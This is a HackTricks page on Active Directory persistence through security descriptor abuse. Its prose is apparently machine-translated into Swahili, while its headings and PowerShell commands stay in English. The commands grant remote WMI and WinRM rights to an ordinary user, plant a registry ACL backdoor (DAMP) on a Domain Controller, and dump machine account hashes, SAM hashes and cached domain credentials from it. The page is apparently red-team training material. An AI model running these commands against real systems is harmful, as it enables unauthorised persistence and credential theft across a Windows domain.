hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

5.1 KiB
Raw Blame History

Security Descriptors

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Security Descriptors

From the docs: Lugha ya Mwelekeo wa Maelezo ya Usalama (SDDL) inaelezea muundo unaotumika kuelezea mwelekeo wa usalama. SDDL inatumia nyuzi za ACE kwa DACL na SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Mwelekeo wa usalama hutumika kuhifadhi idhini ambazo kitu kina juu ya kitu. Ikiwa unaweza tu kufanya mabadiliko madogo katika mwelekeo wa usalama wa kitu, unaweza kupata ruhusa za kuvutia sana juu ya hicho kitu bila kuhitaji kuwa mwanachama wa kundi lenye mamlaka.

Hivyo, mbinu hii ya kudumu inategemea uwezo wa kushinda kila ruhusa inayohitajika dhidi ya vitu fulani, ili uweze kutekeleza kazi ambayo kawaida inahitaji ruhusa za admin lakini bila kuhitaji kuwa admin.

Access to WMI

Unaweza kumpa mtumiaji ruhusa ya kutekeleza WMI kwa mbali ukitumia hii:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

Patia winrm PS console kwa mtumiaji ukitumia hii:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Fikia registry na dump hashes ukitengeneza Reg backdoor using DAMP, ili uweze wakati wowote kupata hash ya kompyuta, SAM na yoyote cached AD credential katika kompyuta. Hivyo, ni muhimu sana kutoa ruhusa hii kwa mtumiaji wa kawaida dhidi ya kompyuta ya Domain Controller:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Angalia Silver Tickets kujifunza jinsi unavyoweza kutumia hash ya akaunti ya kompyuta ya Domain Controller.

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}